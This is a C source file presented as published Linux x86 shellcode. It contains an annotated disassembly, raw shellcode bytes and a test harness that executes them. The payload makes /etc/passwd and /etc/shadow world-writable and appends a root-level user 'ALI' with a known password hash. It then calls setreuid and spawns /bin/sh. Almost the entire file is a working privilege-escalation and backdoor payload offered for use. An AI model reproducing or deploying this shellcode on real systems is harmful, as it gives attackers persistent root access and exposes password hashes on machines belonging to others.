/*# Exploit Title: Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh
# Date: 4/8/2014
# Exploit Author: Ali Razmjoo
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
*/
/*
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
length: 378 bytes
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 6a 0f push $0xf
6: 58 pop %eax
7: 68 6a 73 77 64 push $0x6477736a
c: 5b pop %ebx
d: c1 eb 08 shr $0x8,%ebx
10: 53 push %ebx
11: 68 2f 70 61 73 push $0x7361702f
16: 68 2f 65 74 63 push $0x6374652f
1b: 89 e3 mov %esp,%ebx
1d: 68 41 41 ff 01 push $0x1ff4141
22: 59 pop %ecx
23: c1 e9 08 shr $0x8,%ecx
26: c1 e9 08 shr $0x8,%ecx
29: cd 80 int $0x80
2b: 6a 0f push $0xf
2d: 58 pop %eax
2e: 68 6a 64 6f 77 push $0x776f646a
33: 5b pop %ebx
34: c1 eb 08 shr $0x8,%ebx
37: 53 push %ebx
38: 68 2f 73 68 61 push $0x6168732f
3d: 68 2f 65 74 63 push $0x6374652f
42: 89 e3 mov %esp,%ebx
44: 68 41 41 ff 01 push $0x1ff4141
49: 59 pop %ecx
4a: c1 e9 08 shr $0x8,%ecx
4d: c1 e9 08 shr $0x8,%ecx
50: cd 80 int $0x80
52: 6a 05 push $0x5
54: 58 pop %eax
55: 68 41 73 77 64 push $0x64777341
5a: 5b pop %ebx
5b: c1 eb 08 shr $0x8,%ebx
5e: 53 push %ebx
5f: 68 2f 70 61 73 push $0x7361702f
64: 68 2f 65 74 63 push $0x6374652f
69: 89 e3 mov %esp,%ebx
6b: 68 41 41 01 04 push $0x4014141
70: 59 pop %ecx
71: c1 e9 08 shr $0x8,%ecx
74: c1 e9 08 shr $0x8,%ecx
77: cd 80 int $0x80
79: 89 c3 mov %eax,%ebx
7b: 6a 04 push $0x4
7d: 58 pop %eax
7e: 68 41 73 68 0a push $0xa687341
83: 59 pop %ecx
84: c1 e9 08 shr $0x8,%ecx
87: 51 push %ecx
88: 68 6e 2f 62 61 push $0x61622f6e
8d: 68 3a 2f 62 69 push $0x69622f3a
92: 68 72 6f 6f 74 push $0x746f6f72
97: 68 4c 49 3a 2f push $0x2f3a494c
9c: 68 3a 30 3a 41 push $0x413a303a
a1: 68 4b 2e 3a 30 push $0x303a2e4b
a6: 68 66 77 55 57 push $0x57557766
ab: 68 68 70 31 50 push $0x50317068
b0: 68 7a 59 65 41 push $0x4165597a
b5: 68 41 61 41 51 push $0x51416141
ba: 68 49 38 75 74 push $0x74753849
bf: 68 50 4d 59 68 push $0x68594d50
c4: 68 54 42 74 7a push $0x7a744254
c9: 68 51 2f 38 54 push $0x54382f51
ce: 68 45 36 6d 67 push $0x676d3645
d3: 68 76 50 2e 73 push $0x732e5076
d8: 68 4e 58 52 37 push $0x3752584e
dd: 68 39 4b 55 48 push $0x48554b39
e2: 68 72 2f 59 42 push $0x42592f72
e7: 68 56 78 4b 47 push $0x474b7856
ec: 68 39 55 66 5a push $0x5a665539
f1: 68 46 56 6a 68 push $0x686a5646
f6: 68 46 63 38 79 push $0x79386346
fb: 68 70 59 6a 71 push $0x716a5970
100: 68 77 69 53 68 push $0x68536977
105: 68 6e 54 67 54 push $0x5467546e
10a: 68 58 4d 69 37 push $0x37694d58
10f: 68 2f 41 6e 24 push $0x246e412f
114: 68 70 55 6e 4d push $0x4d6e5570
119: 68 24 36 24 6a push $0x6a243624
11e: 68 41 4c 49 3a push $0x3a494c41
123: 89 e1 mov %esp,%ecx
125: ba 41 41 41 7f mov $0x7f414141,%edx
12a: c1 ea 08 shr $0x8,%edx
12d: c1 ea 08 shr $0x8,%edx
130: c1 ea 08 shr $0x8,%edx
133: cd 80 int $0x80
135: 31 c0 xor %eax,%eax
137: b0 46 mov $0x46,%al
139: 31 db xor %ebx,%ebx
13b: 31 c9 xor %ecx,%ecx
13d: cd 80 int $0x80
13f: 31 c0 xor %eax,%eax
141: b0 46 mov $0x46,%al
143: 31 db xor %ebx,%ebx
145: 31 c9 xor %ecx,%ecx
147: cd 80 int $0x80
149: 68 59 59 59 59 push $0x59595959
14e: 68 58 58 58 58 push $0x58585858
153: 68 2f 73 68 42 push $0x4268732f
158: 68 2f 62 69 6e push $0x6e69622f
15d: 89 e3 mov %esp,%ebx
15f: 31 c0 xor %eax,%eax
161: 88 43 07 mov %al,0x7(%ebx)
164: 89 5b 08 mov %ebx,0x8(%ebx)
167: 89 43 0c mov %eax,0xc(%ebx)
16a: b0 0b mov $0xb,%al
16c: 8d 4b 08 lea 0x8(%ebx),%ecx
16f: 8d 53 0c lea 0xc(%ebx),%edx
172: cd 80 int $0x80
174: b0 01 mov $0x1,%al
176: b3 01 mov $0x1,%bl
178: cd 80 int $0x80
*/
#include <stdio.h>
#include <string.h>
char
sc[] =
"\x31\xc0\x31\xdb\x6a\x0f\x58\x68\x6a\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x0f\x58\x68\x6a\x64\x6f\x77\x5b\xc1\xeb\x08\x53\x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x6a\x05\x58\x68\x41\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\x68\x6e\x2f\x62\x61\x68\x3a\x2f\x62\x69\x68\x72\x6f\x6f\x74\x68\x4c\x49\x3a\x2f\x68\x3a\x30\x3a\x41\x68\x4b\x2e\x3a\x30\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\x68\x41\x4c\x49\x3a\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x59\x59\x59\x59\x68\x58\x58\x58\x58\x68\x2f\x73\x68\x42\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80"
;
int
main(
void
)
{
fprintf
(stdout,
"Length: %d\n\n"
,
strlen
(sc));
(*(
void
(*)()) sc)();